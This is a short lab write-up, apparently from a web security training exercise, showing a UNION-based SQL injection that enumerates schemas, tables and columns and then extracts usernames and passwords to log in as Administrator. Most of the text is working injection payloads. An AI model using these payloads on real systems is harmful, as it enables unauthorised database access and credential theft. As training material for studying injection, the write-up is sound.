We used 1,2 to check how many columns we have using UNION injection and received an ‘Internal Server Error’ :
After we used text inside '' the payload worked fine :
We first used the following payload to see the available databases:
' UNION select schema_name,'xyz' from INFORMATION_SCHEMA.SCHEMATA-- -
We found that there are 3 databases (information_schema is a default database). So, we checked the ‘public’ database and were able to see that there is a table named ‘users_kpidct’ :
' UNION select TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES where table_schema='public'-- -We then checked the columns in that table and was able to see a username and a password column :
' UNION select TABLE_NAME,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name='users_kpidct'-- -
We found that there are 2 columns named ‘username_mhxwif’ and ‘password_uixkku’ in the ‘users_kpidct’ table. So, we used the SELECT command to view the values of the table and were able to retrieve the credentials of the users :
'UNION select username_mhxwif,password_uixkku from users_kpidct-- -
We were able to login as Administrator user and solve the lab :
